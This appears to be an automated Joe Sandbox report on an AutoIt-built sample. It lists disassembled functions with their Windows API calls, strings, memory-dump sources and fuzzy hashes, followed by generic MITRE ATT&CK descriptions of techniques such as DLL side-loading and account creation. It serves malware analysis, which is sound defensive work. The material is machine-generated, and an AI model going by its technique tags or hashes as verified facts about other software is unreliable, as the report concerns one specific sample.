Instruction Fuzzy Hash: 7621F3322083909FD71A4A389C913A63BD1AB4231DF1844AFE485CE293D27DC9C8C359

Function 004244A8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 75COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 004244B8
GetVolumeInformationW.KERNEL32(00000000,?,000000FF,?,?,?,?,000000FF,00000000), ref: 00424523

Strings

%lu, xrefs: 00424536

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: ErrorInformationModeVolume
String ID: %lu
API String ID: 64830657-685833217
Opcode ID: ab25d0a3f84c8be0667e4f19ed05e3358fdcc46152f7499cb6517b5208bf9198
Instruction ID: 52b8ba96a781efff86eab9d710c4b0d9c46507a85bdf29dd436e82410a9f276d
Opcode Fuzzy Hash: ab25d0a3f84c8be0667e4f19ed05e3358fdcc46152f7499cb6517b5208bf9198
Instruction Fuzzy Hash: 2821B632A00118AFDB14AB95DC45EEF7378EF44314F10426BB512A71A1DE78EE85CB98

Function 00413C3D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 74fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00413E1F: CloseHandle.KERNEL32(?,00000000,00413C39,0045C6D0,0040FFF4,0045C6D0,?,?,004105B4,00000000,0047BD30,00000000,0045C6D0,00000000,00000000,0045C6D0), ref: 00413E2F

CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,00000000,?,0045C6D0,00000000,?,00410004,00000000,0045C6D0), ref: 00413CCD

Strings

a+b, xrefs: 00413C81
w+b, xrefs: 00413CA9

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: CloseCreateFileHandle
String ID: a+b$w+b
API String ID: 3498533004-2501309014
Opcode ID: d91cdd8369b11ef9a3c164c8206441f8dd3c3036e2c72543d9734c0028e4c0c9
Instruction ID: edf53baa4e82ff11f7db368c7cffc4024c74940741b87387b299ffaae9dd17bc
Opcode Fuzzy Hash: d91cdd8369b11ef9a3c164c8206441f8dd3c3036e2c72543d9734c0028e4c0c9
Instruction Fuzzy Hash: D9110372604304BAEB201E55D946BD27B98AF1079AF24443FF88862251F63D9E81C59C

Function 0040A9BE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0040AA4A
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0040AA55

Strings

Combobox, xrefs: 0040AA1D

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: MessageSend
String ID: Combobox
API String ID: 3850602802-2096851135
Opcode ID: 7d53d7fb79487526b315ade6c649dc5807220e0396936e94214fb795de8cf3c4
Instruction ID: c4c708d04f0f19327094a8dba0ca1a6e2ba202dda6d3c05fc845e7cbb8daae38
Opcode Fuzzy Hash: 7d53d7fb79487526b315ade6c649dc5807220e0396936e94214fb795de8cf3c4
Instruction Fuzzy Hash: B8119031600348ABDF21CF51CD44ECB3BA5EB49758F01022AF9486A1D1C3799CA0CB99

Function 0040A701 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 57windowCOMMON

Download Yara Rule

APIs

GetWindowTextLengthW.USER32(00000000), ref: 0040A781
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0040A790

Strings

edit, xrefs: 0040A768

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: LengthMessageSendTextWindow
String ID: edit
API String ID: 2978978980-2167791130
Opcode ID: c2653f4a8f2a9fd3339bdeb911189886ce8e1b58d1724ea3b2bfe0e6e1a0c6a7
Instruction ID: 3c8579f57d0c42e063c7e16f0ca5964ab964ff0d5ea83e700c6d5523480232cd
Opcode Fuzzy Hash: c2653f4a8f2a9fd3339bdeb911189886ce8e1b58d1724ea3b2bfe0e6e1a0c6a7
Instruction Fuzzy Hash: AA112B75040308ABEF228F50CC44BEA37A5AB19355F108126FD54672D1C37ECC659B9A

Function 00402FF7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55windowCOMMON

Download Yara Rule

APIs

Part of subcall function 004030FC: SendMessageTimeoutW.USER32(0045C6D0,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00403119
Part of subcall function 004030FC: GetWindowThreadProcessId.USER32(0045C6D0,00000000), ref: 0040312E
Part of subcall function 004030FC: GetCurrentThreadId.KERNEL32 ref: 00403135
Part of subcall function 004030FC: AttachThreadInput.USER32(00000000,?,0040301A,?,00000001), ref: 0040313C

GetFocus.USER32 ref: 0040301A
GetClassNameW.USER32(?,?,000000FF), ref: 0040304A

Strings

%s%d, xrefs: 0040307E

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: Thread$AttachClassCurrentFocusInputMessageNameProcessSendTimeoutWindow
String ID: %s%d
API String ID: 1301947253-1110647743
Opcode ID: ee9be35a30aa6138f74a0f436a39a0fbf44d4576cb0a92abe5729aac7ef09eb6
Instruction ID: 5efcb7465573b2ab94bf4c2dd86e8e81f3aa2c00291f0960b02ed275af46cd7d
Opcode Fuzzy Hash: ee9be35a30aa6138f74a0f436a39a0fbf44d4576cb0a92abe5729aac7ef09eb6
Instruction Fuzzy Hash: 3911A731500708BFDF216F61DC8AF9A7BADBF00341F00442AB50665492D779E655DB58

Function 00401FC4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 54windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000001A2,00000001,?), ref: 00402042

Strings

ComboBox, xrefs: 00401FD8
ListBox, xrefs: 00402009

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: MessageSend
String ID: ComboBox$ListBox
API String ID: 3850602802-1403004172
Opcode ID: a29b9999ab7f9f49425fc7fc832618fee04fed544210bd0aca0d50c725a4f24a
Instruction ID: 6a2bf43351e90442f0b13493faf7ed6cf4a6bb8ea08880f42cadd4b0a594b3be
Opcode Fuzzy Hash: a29b9999ab7f9f49425fc7fc832618fee04fed544210bd0aca0d50c725a4f24a
Instruction Fuzzy Hash: 82112531404365BBDF216A658C46BAF3B65AF02320F1045AAF5107B2D2C67D884AD349

Function 00401EA6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000180,00000000,?), ref: 00401F21

Strings

ComboBox, xrefs: 00401EB7
ListBox, xrefs: 00401EE8

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: MessageSend
String ID: ComboBox$ListBox
API String ID: 3850602802-1403004172
Opcode ID: ed3fcc896b068fd941d8d9cf6e57a1d18e166874037eff3a8c86b7d3873e16cd
Instruction ID: e9e452ee7395a0ac856e9d180b4f38c93f17947b2fa77818a0f771537a2928a5
Opcode Fuzzy Hash: ed3fcc896b068fd941d8d9cf6e57a1d18e166874037eff3a8c86b7d3873e16cd
Instruction Fuzzy Hash: FC01D231948365BBDF21AA658C42BAF3B649F05710F1444BBF8007A2E2C73D8D0AD399

Function 00401F36 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000182,?,00000000), ref: 00401FAF

Strings

ComboBox, xrefs: 00401F47
ListBox, xrefs: 00401F78

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: MessageSend
String ID: ComboBox$ListBox
API String ID: 3850602802-1403004172
Opcode ID: 0242139c27f576f57361c977978787e115d72c8c9176f3bbb4e371a2efab1887
Instruction ID: 3733c26b0adeeb4198756a847cc5c2d4ffc560054351d3a3df5f83e60761485c
Opcode Fuzzy Hash: 0242139c27f576f57361c977978787e115d72c8c9176f3bbb4e371a2efab1887
Instruction Fuzzy Hash: A301F531908366BBDF216A658C42BEF7E649F01710F1444BBF400762E2C73D890A935D

Function 004168A2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,0045C6D0,?,?,?,00442C32,00000000,0045C6D0), ref: 004168CE
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00442C32,00000000,0045C6D0), ref: 004168F0

Strings

2,D, xrefs: 004168F2

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: ByteCharMultiWide
String ID: 2,D
API String ID: 626452242-2418935499
Opcode ID: 0511c5f8d2e7000894d6229759d6eb0e35e8659186a567bc5996a2e2cc60b3a8
Instruction ID: b39320ebaba644329eb74e26f72cd8e91e687b80147ed92d883561fb5b5a7670
Opcode Fuzzy Hash: 0511c5f8d2e7000894d6229759d6eb0e35e8659186a567bc5996a2e2cc60b3a8
Instruction Fuzzy Hash: 84F090321072307EA23166379C4CCEFBE9CDE8B2F8B11062AF509921A1DA259C41D5F9

Function 0042A895 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(0000000A,?,?,?,?,00401261,00000001,?,?), ref: 0042A8C6
FreeLibrary.KERNEL32(?,?,?,?,?,00401261,00000001,?,?), ref: 0042A8DC

Strings

su, xrefs: 0042A8DC

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: FreeLibrarySleep
String ID: su
API String ID: 1926266166-45427494
Opcode ID: b86244694cb31ea88552ad3ae689b7ee6b627a18059bce07507ecd7df422afb2
Instruction ID: 95626d53eeefe99a7a2a974764b31a355aca2ad0c096622ee57089ae5fda058c
Opcode Fuzzy Hash: b86244694cb31ea88552ad3ae689b7ee6b627a18059bce07507ecd7df422afb2
Instruction Fuzzy Hash: 72F09071904315EBCB11AFA4A94048ABBB4AF04304F90447EE85262202D2345616EB16

Function 00441486 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0044149D
PostMessageW.USER32(00000000), ref: 004414A4

Part of subcall function 00415F9F: Sleep.KERNEL32(000000FA,00479E08,?,?,00420420,00479E08,00479E08,00000001,00000000,?,?,0042018E,?,00479E08), ref: 0041602B

Strings

Shell_TrayWnd, xrefs: 00441496

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 882ebc6663f28ca6a0bd98369b9ec18506e29be0596869382302bcdea28e45d6
Instruction ID: 13f1e06114b1c92f5b92a9acec28f52c76ab9d30df0a71a8e479259ccf974a84
Opcode Fuzzy Hash: 882ebc6663f28ca6a0bd98369b9ec18506e29be0596869382302bcdea28e45d6
Instruction Fuzzy Hash: 53D0A733784300BAE2302731EC0AFC76614AB81B21F100826B705AA1D2C5B8B8418658

Function 004414BC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 004414D3
PostMessageW.USER32(00000000), ref: 004414DA

Part of subcall function 00415F9F: Sleep.KERNEL32(000000FA,00479E08,?,?,00420420,00479E08,00479E08,00000001,00000000,?,?,0042018E,?,00479E08), ref: 0041602B

Strings

Shell_TrayWnd, xrefs: 004414CC

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 589e054f64da00f93531d73cfc508ff2935bda88848966350afad539d68171e7
Instruction ID: e84574dfb991bf2cfa4f23f5b5c2518562de79298c4897d62fa121c786450cbf
Opcode Fuzzy Hash: 589e054f64da00f93531d73cfc508ff2935bda88848966350afad539d68171e7
Instruction Fuzzy Hash: C0D0A733784300BAE2312731AC0AFC76614AB85B21F100826B705AA1D2C5B8B8418658

Function 0044B8FC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17COMMON

Download Yara Rule

APIs

__lock.LIBCMT ref: 0044B919

Part of subcall function 0044C6DB: RtlEnterCriticalSection.NTDLL(?), ref: 0044C703

RtlEnterCriticalSection.NTDLL(?), ref: 0044B924

Strings

SF, xrefs: 0044B909

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: CriticalEnterSection$__lock
String ID: SF
API String ID: 3410214836-3927473838
Opcode ID: 9cc0bd6a2d6521f484713d1f5ba177a90f59e14cf639a20cfdb60fcf15beb41d
Instruction ID: a775ad8a655dfed215efc293d7e2241f7e8b16a1d901a40f4fc00a87cdfa6261
Opcode Fuzzy Hash: 9cc0bd6a2d6521f484713d1f5ba177a90f59e14cf639a20cfdb60fcf15beb41d
Instruction Fuzzy Hash: 36D013F5E0110567EF2C55755DC565D625DE6487827654D5BFD01C17C1DB1CD840500E

Function 004144F7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 8windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00414505

Strings

AutoIt, xrefs: 004144F9
Error allocating memory., xrefs: 004144FE

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: Message
String ID: AutoIt$Error allocating memory.
API String ID: 2030045667-4017498283
Opcode ID: dc3e318489bfee34d3df896ec7d206536584264e8443711728aad28883d80498
Instruction ID: 2297da2f1b184b157dc422602c855f75b819f819d268e52e3558a929044e264b
Opcode Fuzzy Hash: dc3e318489bfee34d3df896ec7d206536584264e8443711728aad28883d80498
Instruction Fuzzy Hash: 90B092B07C0309B6E22032906C4BF8426000B04F07F2004167718680D305CE10AC011E

Function 00417DBC Relevance: 5.0, APIs: 4, Instructions: 38COMMONLIBRARYCODE

Download Yara Rule

APIs

CloseHandle.KERNEL32 ref: 00417DD8
CloseHandle.KERNEL32(?), ref: 00417DE6
CloseHandle.KERNEL32(?), ref: 00417DF4
CloseHandle.KERNEL32(?), ref: 00417E06

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: fcc65564337efeded0ceb8b458db640fb801078e850b321e4cb6b3b0c890e3b1
Instruction ID: 9fbff2a46f1a3b6b9582897a9c6c7ca7b8380da915333fee2be5e575753045a6
Opcode Fuzzy Hash: fcc65564337efeded0ceb8b458db640fb801078e850b321e4cb6b3b0c890e3b1
Instruction Fuzzy Hash: 84F04F32240704ABCB219F1ADC82A97B3F4EF54369B14452ED08692630C679EC819E14

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create an account to maintain access to victim systems. With a sufficient level of access, creating such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.
Tactics:	Persistence
Data Sources:	Command: Command Execution, Process: Process Creation, User Account: User Account Creation
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
